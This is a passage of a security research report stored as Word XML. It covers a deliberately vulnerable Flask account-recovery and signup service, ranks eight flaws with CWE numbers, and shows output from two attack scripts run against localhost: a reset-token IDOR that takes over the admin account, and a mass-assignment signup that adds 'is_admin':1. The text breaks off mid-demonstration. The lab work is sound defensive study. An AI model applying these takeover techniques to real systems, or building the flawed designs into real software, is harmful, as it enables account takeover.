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3D91"/>
          <w:sz w:val="44"/>
        </w:rPr>
        <w:t>System 6 — Account Recovery &amp; Enrollment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="555555"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Authentication Security Research Series · Recovery is the hallway everyone forgets to lock</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:color w:val="555555"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Prepared by: warrenvarra01@gmail.com     Date: 2026-08-24     Scope: unified recovery + enrollment</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0B3D91"/>
        </w:rPr>
        <w:t>1. Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>System 6 examines the account lifecycle's two soft doors — password recovery and self-service enrollment — in a deliberately vulnerable Flask service, then rebuilds them securely in FastAPI. The thesis of this system is that hardening the front door (Systems 1–5: passwords, TOTP, passkeys, OAuth2/OIDC, JWT) buys little if the recovery flow is weak: recovery is a parallel authentication path that mints new credentials, and its failures are flow-logic failures, not factor-strength ones. We identified and demonstrated eight real vulnerabilities. Seven yield account takeover or privilege escalation; the two headline findings — a broken account-binding IDOR on reset and self-granted admin at signup — each hand an unauthenticated attacker a full administrator account in a single request. Only one of the eight (missing OTP rate-limiting) is a rerun of the Systems 1–2 failure class; host-header link poisoning, token replay, account binding, and mass assignment are new territory for this series. Every finding is reproduced with a self-contained script and closed in the hardened build, which is verified to still support legitimate recovery.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0B3D91"/>
        </w:rPr>
        <w:t>2. System Overview</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>The service models the full recovery journey plus enrollment, over a small JSON/HTTP API:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t>POST /register — create an account (enrollment).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t>POST /forgot-password — request recovery; issues a one-time code (OTP) and a reset link/token.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t>POST /verify-otp — confirm the emailed OTP.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t>POST /reset-password — set a new password using the reset token.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t>POST /login — authenticate.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t>GET /outbox — study-harness stand-in for the user's mailbox, so attacks can observe delivered mail.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>The intended flow is register → forgot-password → (email delivers OTP + reset link) → verify-otp → reset-password → login. The vulnerable build stores passwords in plaintext, derives the reset token from the wall clock, trusts client input for both privilege fields and the reset target, and enforces no token lifecycle or attempt limits. The hardened build keeps the same contract but redesigns each of these. The system is intentionally unified (recovery + enrollment together); if later split, enrollment (#1, #2) becomes its own system and this remains recovery-only.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0B3D91"/>
        </w:rPr>
        <w:t>3. Vulnerability Analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Eight vulnerabilities, ranked by what they enable. Severity is a qualitative field assessment.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432"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Vulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1152"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>CWE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1152"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>What it enables</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="432"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Broken account binding / IDOR on reset</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1152"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-639</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1152"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="B01C1C"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Reset target taken from client 'email'; a token for the attacker's own account resets any user — full admin takeover.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="432"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Mass assignment → admin at signup</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1152"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-915</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1152"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="B01C1C"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Client JSON bound wholesale; adding is_admin:1 to a signup creates an administrator with no prior access.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="432"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Predictable time-based token</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1152"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-330</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1152"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="B01C1C"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Token = epoch-ms; reconstructed from time in tens of guesses with no access to the victim's mailbox.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="432"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Host-header injection in reset link</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1152"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-644</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1152"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:color w:val="B01C1C"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Reset URL built from the Host header; a poisoned link delivers the victim's real token to the attacker.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="432"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Replayable tokens: no expiry / single-use</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1152"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-640</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1152"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:color w:val="B01C1C"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Tokens never expire, are never consumed, and siblings are never invalidated — a once-seen token is a permanent key.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="432"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>No rate limit / lockout on OTP verify</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1152"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-307</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1152"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:color w:val="B01C1C"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>6-digit OTP with unlimited attempts; brute force reaches the whole 10^6 space and takes over the account.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="432"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>User enumeration at enrollment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1152"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-204</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1152"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:color w:val="555555"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Distinct 'username/email taken' errors confirm which accounts exist, seeding targeted attacks.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="432"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>User enumeration in recovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1152"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-204</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1152"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:color w:val="555555"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Known vs unknown email diverge (200 vs 404), confirming membership from ordinary forgot-password traffic.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="555555"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>New territory vs. prior systems: #4, #6, #8, and #2 are novel to this series — they are authorization, object-binding, and lifecycle failures rather than credential-strength ones. #7 (missing attempt limits) is the single rerun of the Systems 1–2 rate-limiting class.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0B3D91"/>
        </w:rPr>
        <w:t>4. Attack Demonstrations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Each attack is a self-contained script in attacks/, run unmodified against a fresh instance of the vulnerable app on 127.0.0.1:5000. Output below is verbatim from the runs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>Vulnerability #8 — attack_idor_reset.py — broken account binding (headline)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>The attacker registers their own account, requests a reset for it (a token they fully own), then submits that token while naming root in the 'email' field. The server binds the reset to the client email, not the token — resetting the admin's password.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="B01C1C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Real output (vulnerable build):</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="4" w:space="0" w:color="D0D3D9"/>
          <w:left w:val="single" w:sz="4" w:space="0" w:color="D0D3D9"/>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D0D3D9"/>
          <w:right w:val="single" w:sz="4" w:space="0" w:color="D0D3D9"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8640"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8640"/>
            <w:shd w:val="clear" w:fill="F4F5F7"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>[*] Baseline: login to root@corp.example with attacker's password -&gt; HTTP 401 (expected 401)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>[*] Attacker registered own account: attacker@evil.example</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>[*] Submitting attacker's token but with "email":"root@corp.example":</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    server -&gt; HTTP 200: {"account":"root@corp.example","status":"password reset"}</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>[*] Login to root@corp.example with attacker's chosen password:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    -&gt; HTTP 200: {"is_admin":true,"status":"ok","username":"root"}</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>[+] ATTACKER GAIN - full ADMIN takeover using a reset token the</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    attacker legitimately owns for their OWN account. The reset was</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>Vulnerability #2 — attack_mass_assignment.py — self-grant admin at signup</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>A single extra key (is_admin:1) in the signup payload is bound straight into the users row.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="B01C1C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Real output (vulnerable build):</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="4" w:space="0" w:color="D0D3D9"/>
          <w:left w:val="single" w:sz="4" w:space="0" w:color="D0D3D9"/>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D0D3D9"/>
          <w:right w:val="single" w:sz="4" w:space="0" w:color="D0D3D9"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8640"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8640"/>
            <w:shd w:val="clear" w:fill="F4F5F7"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>[*] Honest signup   -&gt; HTTP 201: {"status":"registered","user":"honest_user"}</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>[*] Malicious signup-&gt; HTTP 201: {"status":"registered","user":"mallory"}</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    (payload carried "is_admin": 1)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    honest_user is_admin = False</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    mallory     is_admin = True</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>[+] ATTACKER GAIN - unauthenticated signup produced an ADMIN account.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
